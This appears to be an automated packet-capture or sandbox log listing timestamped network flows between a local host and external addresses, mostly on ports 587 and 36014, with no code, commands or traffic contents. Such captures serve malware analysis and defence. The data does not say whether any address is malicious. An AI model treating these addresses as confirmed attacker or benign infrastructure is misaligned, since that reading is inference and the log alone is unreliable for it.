Nov 26, 2024 09:01:49.298544884 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.298607111 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.298702002 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.298712969 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.298808098 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.298851967 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.298938990 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.299038887 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.299108028 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.299155951 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.299233913 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.299329996 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.299396992 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.299427986 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.299485922 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.299535990 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.299623966 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.299676895 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.299757004 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.299812078 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.299899101 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.299957037 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.300066948 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.300077915 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.300244093 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.353919029 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:49.356229067 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:49.356275082 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:49.356327057 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:49.356338978 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:49.390849113 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.390918970 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.391016006 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.391139030 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.391197920 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.391347885 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.391530037 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.391638041 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.392095089 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.392117977 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.392174959 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.392294884 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.392342091 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.392478943 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.392534018 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.392769098 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.392780066 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.393194914 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.393207073 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.393887997 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.403228045 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.403775930 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.403795958 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.404059887 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.406594992 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.406658888 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.406766891 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.406868935 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.406888962 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.407128096 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.407252073 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.407367945 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.408132076 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.408237934 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.408354044 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.408364058 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.408518076 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.408615112 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.408715010 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.408765078 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.408855915 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.408912897 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.408965111 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.409061909 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.409198999 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.409323931 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.409643888 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.409653902 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.409663916 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.409821033 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.409915924 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.410038948 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.410134077 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.410243988 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.410361052 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.410458088 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.410512924 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.410639048 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.410649061 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.410712004 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.410783052 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.410831928 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.410926104 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.411010981 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.411158085 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.411166906 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.411211967 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.411288023 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.411350012 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.411438942 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.411498070 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.411604881 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.411662102 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.411775112 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.411815882 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.411880970 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.411961079 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.412050962 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.412086010 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.412172079 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.412231922 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.412314892 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.412352085 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.412480116 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.412518978 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.412575960 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.412619114 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.412700891 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.412755013 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.412847042 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.412890911 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.412964106 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.413006067 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.413093090 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.413171053 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.413243055 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.413374901 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.413384914 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:49.589993000 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:49.595276117 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:49.715271950 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:49.715306044 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:49.715342999 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:49.715442896 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:50.334112883 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:50.338134050 CET	49717	80	192.168.2.5	193.122.6.168
Nov 26, 2024 09:01:50.387610912 CET	49769	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:50.458106041 CET	80	49717	193.122.6.168	192.168.2.5
Nov 26, 2024 09:01:50.752582073 CET	80	49717	193.122.6.168	192.168.2.5
Nov 26, 2024 09:01:50.752948999 CET	49762	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:50.793867111 CET	49717	80	192.168.2.5	193.122.6.168
Nov 26, 2024 09:01:50.874700069 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:51.168091059 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:51.168740034 CET	49762	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:51.169086933 CET	49769	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:51.289386034 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:51.587526083 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:51.587950945 CET	49769	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:51.588403940 CET	49792	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:51.708431959 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:51.715600014 CET	49792	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:51.921782970 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:51.925220013 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:51.951540947 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:51.965830088 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.049562931 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.071557045 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.169673920 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.169720888 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.169737101 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.169780016 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.169928074 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.169982910 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.169987917 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.170034885 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.170070887 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.170113087 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.170223951 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.170272112 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.170358896 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.170403957 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.170407057 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.170443058 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.170455933 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.170484066 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.170504093 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.170521021 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.170618057 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.170628071 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.170669079 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.170681000 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.170687914 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.170721054 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.170732975 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.170767069 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.170790911 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.170831919 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.170849085 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.170890093 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.170959949 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.171001911 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.171016932 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.171068907 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.171070099 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.171114922 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.171154976 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.171204090 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.171235085 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.171278000 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.171339035 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.171380997 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.212080956 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.212161064 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.290769100 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.290834904 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.290935993 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.290990114 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.291148901 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.291202068 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.291214943 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.291256905 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.291271925 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.291281939 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.291297913 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.291327953 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.291398048 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.291409016 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.291418076 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.291452885 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.291589022 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.291718960 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.291729927 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.291760921 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.291760921 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.291771889 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.291805983 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.291825056 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.291857004 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.291866064 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.291985989 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.291996956 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292129040 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292139053 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292166948 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292176962 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292224884 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292239904 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292251110 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292270899 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292321920 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292382002 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292392969 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292413950 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.292429924 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292440891 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292450905 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.292464018 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.292464972 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292480946 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.292505980 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.292510033 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292541027 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292552948 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.292579889 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.292613029 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292622089 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292663097 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292670012 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.292706966 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.292706966 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292749882 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.292785883 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292798042 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292830944 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.292836905 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292846918 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292859077 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292881012 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292916059 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292968988 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292979002 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.292989969 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.293004036 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.293013096 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.316591024 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.332067966 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.356522083 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.399956942 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.410881042 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.411027908 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.411039114 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.411180973 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.411190987 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.411376953 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.411387920 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.411484003 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.411493063 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.411555052 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.411566019 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.411674976 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.411698103 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.411804914 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.411828995 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.411942959 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.411998034 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.412082911 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.412106991 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.412205935 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.412215948 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.412446976 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.412502050 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.412626982 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.412636995 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.412688971 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.412883997 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.412893057 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.412961006 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.413038969 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.413043976 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.413104057 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.413139105 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.413147926 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.413188934 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.413197994 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.413393974 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.413428068 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.413587093 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.413598061 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.413713932 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.413733959 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.413872004 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.413913012 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.414063931 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.414107084 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.414263964 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.414418936 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.414429903 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.414482117 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.414530039 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.414577007 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.414844990 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.414855003 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.414906979 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.414916992 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.414937019 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.414947033 CET	36014	49734	212.162.149.53	192.168.2.5
